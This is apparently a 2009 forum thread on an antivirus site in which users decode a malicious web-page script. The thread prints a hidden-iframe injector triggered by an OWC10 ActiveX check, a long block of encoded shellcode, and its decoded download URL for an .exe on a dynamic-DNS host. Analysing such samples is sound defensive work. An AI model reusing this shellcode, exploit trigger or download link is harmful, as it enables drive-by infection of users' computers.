redbsd - 2009-8-21 17:23:00
下面这段代码我不知道该用哪种方法解?看了你教程的那些方法,也没有解了,请你指点,谢谢。
<script>
function qqjiaoyouzhongxin()
{
pingfan = "<iframe src=help.htm width=111 height=0></iframe>";
setTimeout("document.write(pingfan)", 5000 );
}
</script>
<script>
/*1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111*/
try{var a;
var ppa=new ActiveXObject("OWC10.Spreadsheet");}
catch(a){};
finally{if(a!="[object Error]"){qqjiaoyouzhongxin();}}
/*1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111*/
</script>
用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; CIBA; 360SE)
aaccbbdd - 2009-8-21 17:25:00
直接过滤么
很明显
help.htm
是下一级的
redbsd - 2009-8-21 17:38:00
谢谢aaccbbdd ,我这就试试。
yang12312341242 - 2009-8-21 17:38:00
看不懂
redbsd - 2009-8-21 17:51:00
var YT=unescape;
var s=YT("%u"+"E890"+"%u"+"034D"+"%u"+"0000"+"%u"+"0068"+"%u"+"0020"+"%u"+"6A00"+"%u"+"FF00"+"%u"+"B9D0"+"%u"+"0800"+"%u"+"0000"+"%u"+"F88B"+"%u"+"05EB"+"%u"+"F35E"+"%u"+"FFA4"+"%u"+"E8D0"+"%u"+"FFF6"+"%u"+"FFFF"+"%u"+"54E8");
s+=YT("%u"+"0003"+"%u"+"8B00"+"%u"+"E8F8"+"%u"+"0038"+"%u"+"0000"+"%u"+"64E8"+"%u"+"0001"+"%u"+"E800"+"%u"+"0046"+"%u"+"0000"+"%u"+"F2E8"+"%u"+"0003"+"%u"+"8B00"+"%u"+"E8F8"+"%u"+"0022"+"%u"+"0000"+"%u"+"5BE8"+"%u"+"0001"+"%u"+"E800");
s+=YT("%u"+"0030"+"%u"+"0000"+"%u"+"A0E8"+"%u"+"0003"+"%u"+"8B00"+"%u"+"E8F8"+"%u"+"000C"+"%u"+"0000"+"%u"+"78E8"+"%u"+"0001"+"%u"+"E800"+"%u"+"001A"+"%u"+"0000"+"%u"+"58EB"+"%u"+"8B53"+"%u"+"53DC"+"%u"+"406A"+"%u"+"0068"+"%u"+"0010");
s+=YT("%u"+"5700"+"%u"+"C8E8"+"%u"+"0002"+"%u"+"E800"+"%u"+"00FA"+"%u"+"0000"+"%u"+"C358"+"%u"+"8B53"+"%u"+"53DC"+"%u"+"206A"+"%u"+"0068"+"%u"+"0010"+"%u"+"5700"+"%u"+"B0E8"+"%u"+"0002"+"%u"+"E800"+"%u"+"00E2"+"%u"+"0000"+"%u"+"C358");
s+=YT("%u"+"E857"+"%u"+"0453"+"%u"+"0000"+"%u"+"F88B"+"%u"+"C933"+"%u"+"3349"+"%u"+"B0C0"+"%u"+"FCC3"+"%u"+"AEF2"+"%u"+"478D"+"%u"+"5FFF"+"%u"+"5BC3"+"%u"+"C63E"+"%u"+"B807"+"%u"+"893E"+"%u"+"015F"+"%u"+"3E66"+"%u"+"47C7"+"%u"+"FF05");
s+=YT("%u"+"C3E0"+"%u"+"ACE9"+"%u"+"0004"+"%u"+"5B00"+"%u"+"EC81"+"%u"+"0114"+"%u"+"0000"+"%u"+"D48B"+"%u"+"C73E"+"%u"+"6302"+"%u"+"646D"+"%u"+"3E20"+"%u"+"42C7"+"%u"+"2F04"+"%u"+"2063"+"%u"+"3E22");
s+=YT("%u"+"42C7"+"%u"+"6308"+"%u"+"646D"+"%u"+"3E20"+"%u"+"42C7"+"%u"+"2F0C"+"%u"+"2063"+"%u"+"8322"+"%u"+"10C2"+"%u"+"C033"+"%u"+"5050"+"%u"+"0468"+"%u"+"0001"+"%u"+"5200"+"%u"+"5053"+"%u"+"C8E8"+"%u"+"0003");
s+=YT("%u"+"E800"+"%u"+"0072"+"%u"+"0000"+"%u"+"FC8B"+"%u"+"C78B"+"%u"+"C083"+"%u"+"3E08"+"%u"+"188A"+"%u"+"DB84"+"%u"+"0374"+"%u"+"EB40"+"%u"+"66F6"+"%u"+"C73E"+"%u"+"2200"+"%u"+"3322"+"%u"+"3ED2"+"%u"+"5088");
s+=YT("%u"+"8302"+"%u"+"54EC"+"%u"+"C033"+"%u"+"DB33"+"%u"+"CC8B"+"%u"+"F883"+"%u"+"7D54"+"%u"+"3E09"+"%u"+"1C89"+"%u"+"8308"+"%u"+"04C0"+"%u"+"F2EB"+"%u"+"CC8B"+"%u"+"D98B"+"%u"+"C383"+"%u"+"3310"+"%u"+"3EC0");
s+=YT("%u"+"43C7"+"%u"+"012C"+"%u"+"0000"+"%u"+"5100"+"%u"+"5053"+"%u"+"5050"+"%u"+"5050"+"%u"+"5750"+"%u"+"E850"+"%u"+"033B"+"%u"+"0000"+"%u"+"19E8"+"%u"+"0000"+"%u"+"6400"+"%u"+"04A1"+"%u"+"0000"+"%u"+"8D00");
s+=YT("%u"+"60A0"+"%u"+"FFFF"+"%u"+"E8FF"+"%u"+"0339"+"%u"+"0000"+"%u"+"DB33"+"%u"+"5353"+"%u"+"5353"+"%u"+"D0FF"+"%u"+"3880"+"%u"+"74E9"+"%u"+"8005"+"%u"+"E838"+"%u"+"0F75"+"%u"+"7881"+"%u"+"9005"+"%u"+"4190");
s+=YT("%u"+"7490"+"%u"+"5506"+"%u"+"EC8B"+"%u"+"408D"+"%u"+"FF05"+"%u"+"E8E0"+"%u"+"FF17"+"%u"+"FFFF"+"%u"+"E8C3"+"%u"+"FF11"+"%u"+"FFFF"+"%u"+"11B8"+"%u"+"0401"+"%u"+"C280"+"%u"+"000C"+"%u"+"04E8"+"%u"+"FFFF");
s+=YT("%u"+"33FF"+"%u"+"50C0"+"%u"+"E854"+"%u"+"0054"+"%u"+"0000"+"%u"+"E850"+"%u"+"028B"+"%u"+"0000"+"%u"+"D0FF"+"%u"+"8036"+"%u"+"243C"+"%u"+"7700"+"%u"+"E80A"+"%u"+"0241"+"%u"+"0000"+"%u"+"FF33"+"%u"+"FF57");
s+=YT("%u"+"E8D0"+"%u"+"01FB"+"%u"+"0000"+"%u"+"FF68"+"%u"+"0000"+"%u"+"FF00"+"%u"+"E8D0"+"%u"+"FED1"+"%u"+"FFFF"+"%u"+"5753"+"%u"+"3356"+"%u"+"50C0"+"%u"+"E854"+"%u"+"001E"+"%u"+"0000"+"%u"+"E850"+"%u"+"0255");
s+=YT("%u"+"0000"+"%u"+"D0FF"+"%u"+"8036"+"%u"+"243C"+"%u"+"7700"+"%u"+"E80A"+"%u"+"020B"+"%u"+"0000"+"%u"+"FF33"+"%u"+"FF57"+"%u"+"58D0"+"%u"+"5F5E"+"%u"+"C35B"+"%u"+"02EB"+"%u"+"C358"+"%u"+"F9E8"+"%u"+"FFFF");
s+=YT("%u"+"56FF"+"%u"+"8357"+"%u"+"08EC"+"%u"+"FC8B"+"%u"+"086A"+"%u"+"3E57"+"%u"+"77FF"+"%u"+"E814"+"%u"+"025D"+"%u"+"0000"+"%u"+"D0FF"+"%u"+"FC8B"+"%u"+"6168"+"%u"+"656D"+"%u"+"6800"+"%u"+"4549"+"%u"+"7246");
s+=YT("%u"+"F48B"+"%u"+"08B9"+"%u"+"0000"+"%u"+"F300"+"%u"+"75A6"+"%u"+"6A2F"+"%u"+"3E00"+"%u"+"74FF"+"%u"+"2024"+"%u"+"24E8"+"%u"+"0002"+"%u"+"FF00"+"%u"+"8BD0"+"%u"+"E8F8"+"%u"+"01CB"+"%u"+"0000"+"%u"+"D0FF");
s+=YT("%u"+"F83B"+"%u"+"0874"+"%u"+"8B36"+"%u"+"2444"+"%u"+"3E20"+"%u"+"00FF"+"%u"+"FF3E"+"%u"+"2474"+"%u"+"E81C"+"%u"+"01EF"+"%u"+"0000"+"%u"+"D0FF"+"%u"+"C483"+"%u"+"5F10"+"%u"+"B85E"+"%u"+"0001"+"%u"+"0000");
s+=YT("%u"+"68C3"+"%u"+"6E6F"+"%u"+"0000"+"%u"+"7568"+"%u"+"6C72"+"%u"+"EB6D"+"%u"+"8D15"+"%u"+"2444"+"%u"+"5004"+"%u"+"0BE8"+"%u"+"FFFE"+"%u"+"50FF"+"%u"+"4AE8"+"%u"+"0002"+"%u"+"E900"+"%u"+"FEE0"+"%u"+"FFFF");
s+=YT("%u"+"E6E8"+"%u"+"FFFF"+"%u"+"83FF"+"%u"+"08C4"+"%u"+"6AC3"+"%u"+"686C"+"%u"+"746E"+"%u"+"6C64"+"%u"+"15EB"+"%u"+"448D"+"%u"+"0424"+"%u"+"E850"+"%u"+"FDE4"+"%u"+"FFFF"+"%u"+"E850"+"%u"+"0223"+"%u"+"0000");
s+=YT("%u"+"B9E9"+"%u"+"FFFE"+"%u"+"E8FF"+"%u"+"FFE6"+"%u"+"FFFF"+"%u"+"C483"+"%u"+"C308"+"%u"+"3368"+"%u"+"0032"+"%u"+"6800"+"%u"+"7375"+"%u"+"7265"+"%u"+"15EB"+"%u"+"448D"+"%u"+"0424"+"%u"+"E850"+"%u"+"FDBA");
s+=YT("%u"+"FFFF"+"%u"+"E850"+"%u"+"01F9"+"%u"+"0000"+"%u"+"8FE9"+"%u"+"FFFE"+"%u"+"E8FF"+"%u"+"FFE6"+"%u"+"FFFF"+"%u"+"C483"+"%u"+"C308"+"%u"+"6368"+"%u"+"7776"+"%u"+"6800"+"%u"+"6873"+"%u"+"6F64"+"%u"+"15EB");
s+=YT("%u"+"448D"+"%u"+"0424"+"%u"+"E850"+"%u"+"FD90"+"%u"+"FFFF"+"%u"+"E850"+"%u"+"01CF"+"%u"+"0000"+"%u"+"65E9"+"%u"+"FFFE"+"%u"+"E8FF"+"%u"+"FFE6"+"%u"+"FFFF"+"%u"+"C483"+"%u"+"C308"+"%u"+"7668"+"%u"+"7867");
s+=YT("%u"+"EB00"+"%u"+"8D15"+"%u"+"2444"+"%u"+"5004"+"%u"+"6BE8"+"%u"+"FFFD"+"%u"+"50FF"+"%u"+"AAE8"+"%u"+"0001"+"%u"+"E900"+"%u"+"FE40"+"%u"+"FFFF"+"%u"+"E6E8"+"%u"+"FFFF"+"%u"+"83FF"+"%u"+"04C4"+"%u"+"E8C3");
s+=YT("%u"+"01AB"+"%u"+"0000"+"%u"+"1B68"+"%u"+"46C6"+"%u"+"5079"+"%u"+"C6E8"+"%u"+"0001"+"%u"+"8300"+"%u"+"08C4"+"%u"+"E8C3"+"%u"+"0197"+"%u"+"0000"+"%u"+"EC68"+"%u"+"0397"+"%u"+"500C"+"%u"+"B2E8"+"%u"+"0001");
s+=YT("%u"+"8300"+"%u"+"08C4"+"%u"+"E8C3"+"%u"+"0183"+"%u"+"0000"+"%u"+"AA68"+"%u"+"0DFC"+"%u"+"507C"+"%u"+"9EE8"+"%u"+"0001"+"%u"+"8300"+"%u"+"08C4"+"%u"+"E8C3"+"%u"+"016F"+"%u"+"0000"+"%u"+"ED68"+"%u"+"EF56");
s+=YT("%u"+"5036"+"%u"+"8AE8"+"%u"+"0001"+"%u"+"8300"+"%u"+"08C4"+"%u"+"E8C3"+"%u"+"015B"+"%u"+"0000"+"%u"+"F068"+"%u"+"048A"+"%u"+"505F"+"%u"+"76E8"+"%u"+"0001"+"%u"+"8300"+"%u"+"08C4"+"%u"+"E8C3"+"%u"+"FEF7");
s+=YT("%u"+"FFFF"+"%u"+"7868"+"%u"+"DB68"+"%u"+"501C"+"%u"+"62E8"+"%u"+"0001"+"%u"+"8300"+"%u"+"08C4"+"%u"+"E8C3"+"%u"+"0133"+"%u"+"0000"+"%u"+"EF68"+"%u"+"E0CE"+"%u"+"5060"+"%u"+"4EE8"+"%u"+"0001"+"%u"+"8300");
s+=YT("%u"+"08C4"+"%u"+"E8C3"+"%u"+"011F"+"%u"+"0000"+"%u"+"B068"+"%u"+"2D49"+"%u"+"50DB"+"%u"+"3AE8"+"%u"+"0001"+"%u"+"8300"+"%u"+"08C4"+"%u"+"E8C3"+"%u"+"FF36"+"%u"+"FFFF"+"%u"+"AB68"+"%u"+"9B5E"+"%u"+"501E");
s+=YT("%u"+"26E8"+"%u"+"0001"+"%u"+"8300"+"%u"+"08C4"+"%u"+"E8C3"+"%u"+"FEA7"+"%u"+"FFFF"+"%u"+"5968"+"%u"+"8197"+"%u"+"5002"+"%u"+"12E8"+"%u"+"0001"+"%u"+"8300"+"%u"+"08C4"+"%u"+"E8C3"+"%u"+"00E3"+"%u"+"0000");
s+=YT("%u"+"7E68"+"%u"+"E2D8"+"%u"+"5073"+"%u"+"FEE8"+"%u"+"0000"+"%u"+"8300"+"%u"+"08C4"+"%u"+"E8C3"+"%u"+"00CF"+"%u"+"0000"+"%u"+"9E68"+"%u"+"BBF9"+"%u"+"5035"+"%u"+"EAE8"+"%u"+"0000"+"%u"+"8300"+"%u"+"08C4");
s+=YT("%u"+"E8C3"+"%u"+"FE92"+"%u"+"FFFF"+"%u"+"5768"+"%u"+"B5A0"+"%u"+"50BB"+"%u"+"D6E8"+"%u"+"0000"+"%u"+"8300"+"%u"+"08C4"+"%u"+"E8C3"+"%u"+"FE7E"+"%u"+"FFFF"+"%u"+"1A68"+"%u"+"1E7A"+"%u"+"5002"+"%u"+"C2E8"+"%u"+"0000");
s+=YT("%u"+"8300"+"%u"+"08C4"+"%u"+"E8C3"+"%u"+"FE6A"+"%u"+"FFFF"+"%u"+"E068"+"%u"+"305B"+"%u"+"5094"+"%u"+"AEE8"+"%u"+"0000"+"%u"+"8300"+"%u"+"08C4"+"%u"+"E8C3"+"%u"+"FE56"+"%u"+"FFFF"+"%u"+"9768"+"%u"+"E2C9");
s+=YT("%u"+"50A3"+"%u"+"9AE8"+"%u"+"0000"+"%u"+"8300"+"%u"+"08C4"+"%u"+"E8C3"+"%u"+"FE42"+"%u"+"FFFF"+"%u"+"6868"+"%u"+"C524"+"%u"+"50B3"+"%u"+"86E8"+"%u"+"0000"+"%u"+"8300"+"%u"+"08C4"+"%u"+"E8C3"+"%u"+"0057");
s+=YT("%u"+"0000"+"%u"+"7268"+"%u"+"B3FE"+"%u"+"5016"+"%u"+"72E8"+"%u"+"0000"+"%u"+"8300"+"%u"+"08C4"+"%u"+"E8C3"+"%u"+"FE44"+"%u"+"FFFF"+"%u"+"13EB"+"%u"+"656A"+"%u"+"E850"+"%u"+"FBE0"+"%u"+"FFFF"+"%u"+"E850");
s+=YT("%u"+"FEAB"+"%u"+"FFFF"+"%u"+"B5E9"+"%u"+"FFFC"+"%u"+"E8FF"+"%u"+"FFE8"+"%u"+"FFFF"+"%u"+"E8C3"+"%u"+"FDA9"+"%u"+"FFFF"+"%u"+"4F68"+"%u"+"4FEF"+"%u"+"5005"+"%u"+"3EE8"+"%u"+"0000"+"%u"+"8300"+"%u"+"08C4");
s+=YT("%u"+"E8C3"+"%u"+"000F"+"%u"+"0000"+"%u"+"8E68"+"%u"+"0E4E"+"%u"+"50EC"+"%u"+"2AE8"+"%u"+"0000"+"%u"+"8300"+"%u"+"08C4"+"%u"+"33C3"+"%u"+"64C0"+"%u"+"408B"+"%u"+"8530"+"%u"+"78C0"+"%u"+"3E10"+"%u"+"408B");
s+=YT("%u"+"3E0C"+"%u"+"708B"+"%u"+"AD1C"+"%u"+"8B3E"+"%u"+"0840"+"%u"+"EBC3"+"%u"+"3E0B"+"%u"+"408B"+"%u"+"8334"+"%u"+"7CC0"+"%u"+"8B3E"+"%u"+"3C40"+"%u"+"60C3"+"%u"+"8B36"+"%u"+"246C"+"%u"+"3624"+"%u"+"458B");
s+=YT("%u"+"363C"+"%u"+"548B"+"%u"+"7828"+"%u"+"D503"+"%u"+"8B3E"+"%u"+"184A"+"%u"+"8B3E"+"%u"+"205A"+"%u"+"DD03"+"%u"+"3BE3"+"%u"+"3E49"+"%u"+"348B"+"%u"+"038B"+"%u"+"33F5"+"%u"+"33FF"+"%u"+"FCC0"+"%u"+"84AC");
s+=YT("%u"+"74C0"+"%u"+"C107"+"%u"+"0DCF"+"%u"+"F803"+"%u"+"F4EB"+"%u"+"3B36"+"%u"+"247C"+"%u"+"7528"+"%u"+"3EDF"+"%u"+"5A8B"+"%u"+"0324"+"%u"+"66DD"+"%u"+"8B3E"+"%u"+"4B0C"+"%u"+"8B3E"+"%u"+"1C5A"+"%u"+"DD03");
s+=YT("%u"+"8B3E"+"%u"+"8B04"+"%u"+"C503"+"%u"+"8936"+"%u"+"2444"+"%u"+"611C"+"%u"+"E8C3"+"%u"+"FB4F"+"%u"+"FFFF");
var u=YT("%u7468%u7074%u2f3a%u312f%u3231%u3833%u3638%u332e%u3233%u2e32%u726f%u2f67%u6c61%u2e67%u7865%u0065");
var c=s+u;
这个就是用固定分隔符(%u)分隔四位一组的shellcode吧,两次ESC解码,得到: ,
http://1123886.3322.org/alg.exe
谢谢aaccbbdd指点。
redbsd - 2009-8-21 17:54:00
不好意思,忘说了,“没有把握请不要点击上面那个链接”,小心中招。
© 2000 - 2024 Rising Corp. Ltd.